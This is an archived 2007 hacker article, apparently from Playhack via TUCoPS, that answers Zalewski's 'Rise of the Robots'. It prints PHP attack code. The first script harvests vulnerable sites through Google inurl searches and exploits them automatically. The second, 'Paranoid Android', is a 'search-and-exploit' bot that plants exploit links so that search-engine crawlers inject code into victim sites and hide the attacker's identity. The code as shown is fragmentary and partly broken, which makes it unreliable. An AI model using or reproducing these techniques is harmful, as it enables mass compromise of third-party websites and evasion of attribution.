TUCoPS :: HP Unsorted I :: tb10912.htm

I, Bot. Taking advantage of robots power (Article)
I, Bot. Taking advantage of robots power (Article)
I, Bot. Taking advantage of robots power (Article)

Title: I, Bot. Taking advantage of robots power.
Re: "Against the System: Rise of the Robots" of Michal Zalewski

Author: Crossbower - crossbower#katamail.com
Site: http://www.playhack.net 

Date: 2007-04-18


-[ SUMMARY ]---------------------------------------------------------------------

0x00: Intro, let's start
0x01: Abstract
0x02: Implementation
0x03: The code: Paranoid Android
0x04: Conclusion


---[ 0x00: Intro, let's start ]

Hello to everybody. I'm very sorry for my poor english but it's not my
first language. I hope you will excuse eventual errors Wink

This paper wants to be a reply to an article published on Phrack by Michal Zalewski.
He was the first that has assumed the possibility to take advantage by multitude of
robots that every moment scanning the web to search information.
We begin with the introduction to the article of Zalewski, then will see how
implementing its ideas for writing ours bots.

"Consider a remote exploit that is able to compromise a remote system
without sending any attack code to his victim. Consider an exploit
which simply creates local file to compromise thousands of computers,
and which does not involve any local resources in the attack. Welcome to
the world of zero-effort exploit techniques. Welcome to the world of
automation, welcome to the world of anonymous, dramatically difficult
to stop attacks resulting from increasing Internet complexity.

Zero-effort exploits create their 'wishlist', and leave it somewhere
in cyberspace - can be even its home host, in the place where others
can find it. Others - Internet workers (see references, [D]) - hundreds
of never sleeping, endlessly browsing information crawlers, intelligent
agents, search engines... They come to pick this information, and -
unknowingly - to attack victims. You can stop one of them, but can't
stop them all. You can find out what their orders are, but you can't
guess what these orders will be tomorrow, hidden somewhere in the abyss
of not yet explored cyberspace.

Your private army, close at hand, picking orders you left for them
on their way. You exploit them without having to compromise them. They
do what they are designed for, and they do their best to accomplish it.
Welcome to the new reality, where our A.I. machines can rise against us."

Now we see as all this is possible in reality Wink Have fun!


---[ 0x01: Abstract ]

The idea that the search engines (first of all Google) could be transformed
in powerful arms in the hands of attackers is not new.
Google hacking, search dork, cache digging, are all techniques that allow
to take advantage of a minimal part of motors acquaintance, but a very few
persons, till now, had thought to use their more sensitive and powerful part,
the robot... and this is the topic of this article.

A robot is a program that automatically traverses the Web's hypertext structure
by retrieving pages or documents, and recursively retrieving all documents that
are referenced.
Note that "recursive" here doesn't limit the definition to any specific traversal
algorithm. Even if a robot applies some heuristic to the selection and order of
documents to visit and spaces out requests over a long space of time, it is still
a robot.
Normal Web browsers aren't robots, because they are operated by a human, and
don't automatically retrieve referenced documents.

Web robots are sometimes referred to as Web Wanderers, Web Crawlers, or Spiders.
These names are a bit misleading because they give the impression the software itself
moves between sites like a virus. This not the case, a robot simply visits sites
by requesting documents from them.

What kinds of robots are there? Robots can be used for a number of purposes:
* Indexing
* HTML validation
* Link validation
* "What's New" monitoring
* Mirroring

How many robots circulate in the web?

For having a complete panoramic you can consult the list of active bot
We will not deepen because this argument does not belong to the article's


---[ 0x02: Implementation ]

Which are the force point of a bot?
Surely the speed, the ability to execute a great number of operations in a
little time..
For the exploiting we can write a bot with a function like mirroring,
that with the informations found in a database or in a search engine, can complete
mass penetrations without scanning a great number of useless targets.

A first (and simple) implementation is this script. It can search in a search
engine like google (or other..) and create an array with the addresses
of sites with determined web pages. If qualified, it can exploit automatically
many type of vulnerabilities (for example the sql injection).
Although it is a simple script can become a destructive arm used in the
mistaken way (ok noob?).
I ask therefore eventual readers lamer not to use it in order to damage. It's only
Proof of Concept.

- - - - -

    code:  - - - - -




    if ($argc<2) {
    echo "Usage: ".$argv[0]."  
    ".$argv[0]." /script/vuln.php?cmd= 30



    $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

    function SendPack($packet)
      global $proxy, $host, $port, $proxy_regex;
      if ($proxy=='') {
        if (!$ock) {
          echo 'No response from '.$host.':'.$port; die;
      else {
       $c = preg_match($proxy_regex,$proxy);
        if (!$c) {
          echo 'Not a valid proxy...';die;
        echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
        if (!$ock) {
          echo 'No response from proxy...';die;
      if ($proxy=='') {
        while (!feof($ock)) {
      else {
        while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$buffer))) {

    //Global variables
$host="www.google.com"; //Our vulnerability database ;) 
    $path=$argv[1];         //String
    $port=80;               //Port (Web)
    $proxy="";              //For your proxy
    $html;                  //Buffer for result

    //Google variables
    $SeInurl="/search?q=inurl%3A"; //Search inurl
    $SeType="&btnG=Search";        //Search type
    if ($argv[2]) $SeNumber="&num=".$argv[2];
    else $SeNumber="&num=20";      //Number of result

    if ($path[0]<>'/')  {print("*warning: string must begin with '/'\n");}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} 

    //$path=urlencode($path);   //Url encoding

    echo "1: Find Targets...\n\n";
    //Google's inurl search (example):

    /* Make and Send Query */
    $packet ="GET ".$SeInurl.$path.$SeNumber.$SeType." HTTP/1.0\r\n";
    $packet.="Host: ".$host."\r\n";
    $packet.="Connection: Close\r\n\r\n";


    /* Find targets urls */
preg_match_all('#\b((((ht|f)tps?://)|(www|ftp)\.)[a-zA-Z0-9\.\#\@\:%&_/\?\=\~\-]+)#e',$html, $match); 
    for ($i=0; $i

    - - - - -

- - - - -


---[ 0x03: The code: Paranoid Android ]

Now we try to implement a different code. A code that uses, in a truly new way,
the crawler of search engines.

The operations of a crawler are simple:
In general, it starts with a list of URLs to visit, called the "seeds".
As the crawler visits these URLs, it identifies all the hyperlinks in the page
and adds them to the list of URLs to visit, called the "crawl frontier".
URLs from the frontier are recursively visited according to a set of policies.

As we can see, this method is closely correlated to the contents of a web page,
that can send it to explore other numerous links.
Now we ask ourselves: how much will be sure this type of method?

We suppose that visited website contains exploit links (example: sql injection)
that call other dynamic pages of websites. What happens in this case?
The heuristic spider follows the links and injects code to the websites.
Then, it saves all result to the database of its search engine.
It's not fantastic? Wink

And in logs which IP does remain? The IP of the search engine, that with the many
sites visited every day by its spider, will make an hard work to find our malicious
site. If it is disposed to make searches=85
In any case if our site is uncovered, how many other searches are necessary to
find the guilty?

Now because the code is better than thousand words, here a robot that if configured
correctly can use the techniques described in this article.

Voil=E0 Paranoid Android:

- - - - -

    code:  - - - - -

    Paranoid Android, By Crossbower

    $host="www.google.com"; //Our vulnerability database ;) 
    $port=80;                //Port (Web)
    $html;                   //Buffer for result

    //Google variables
    $SeInurl="/search?q=inurl%3A";  //Search inurl
    $SeCache="/search?q=cache%3A";  //Search cache
    $SeType="&btnG=Search";         //Search type
    $SeNumber="&num=5";             //Number of result

    Google's inurl search (example):

    //$string=urlencode($string);   //Url encoding


    echo "        
    --- PARANOID ANDROID ---                
  Automatic SaE (search-and-exploit) Bot
   by Crossbower Crossbower*katamail*com

"; //Loading... error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",5); function SendPack($packet) { global $host, $port; $ock=fsockopen(gethostbyname($host),$port); if (!$ock) { echo 'No response from '.$host.':'.$port; die; } fputs($ock,$packet); $buffer=''; while (!feof($ock)) { $buffer.=fgets($ock); } fclose($ock); return($buffer); } //START: /* Make and Send Query */ $packet ="GET ".$SeInurl.$string.$SeNumber.$SeType." HTTP/1.0\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Connection: Close\r\n\r\n"; $html=SendPack($packet); //Open log file $handle =fopen($LogFile,'a'); //Inizialize the log fwrite($handle,"\n# ".date("D dS M, Y h:i a :")."

\n"); fwrite($handle,"Visited by:
\n"); $Spider =$REMOTE_HOST."
"; $Spider.=$HTTP_USER_AGENT."

\n"; fwrite($handle,$Spider); fwrite($handle,"Links (google cache):
\n"); $Log ="$Log.="http://".$host.$SeCache; //Find targets preg_match_all('#\b((((ht|f)tps?://)|(www|ftp)\.)[a-zA-Z0-9\.\#\@\:%&_/\?\=\~\-]+)#e',$html, $match); for ($i=0; $i".$match[1][$i].$exploit."
\n"; //Update log fwrite($handle,$Log.$match[1][$i].$exploit."\">".$match[1][$i].$exploit."
\n"); }} //Close log fwrite($handle,"

\n"); fclose($handle); ?> - - - - - - - - - - -----------------------------------------------------------------------------[/] ---[ 0x06: Conclusion ] I hope these informations have interested to you and they have made you to comprise the gravity of the possible attacks with robots, in future... In order to deepen you can read these documents: - "Against the System: Rise of the Robots" by Michal Zalewski http://www.phrack.org/archives/57/p57-0x13 - "The Anatomy of a Large-Scale Hypertextual Web Search Engine" Googlebot concept, Sergey Brin, Lawrence Page, Stanford University http://www7.scu.edu.au/programme/fullpapers/1921/com1921.htm - Proprietary web solutions security, Michal Zalewski http://lcamtuf.coredump.cx/milpap.txt - "A Standard for Robot Exclusion", Martijn Koster http://info.webcrawler.com/mak/projects/robots/norobots.html - "The Web Robots Database" http://www.robotstxt.org/wc/active.html http://www.robotstxt.org/wc/active/html/type.html - "Web Security FAQ", Lincoln D. Stein http://www.w3.org/Security/Faq/www-security-faq.html Ok, this is all people... For clarifications, questions and other esitate to mail me Wink Crossbower - crossbower#katamail.com Site: http://www.playhack.net -----------------------------------------------------------------------------[/]

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH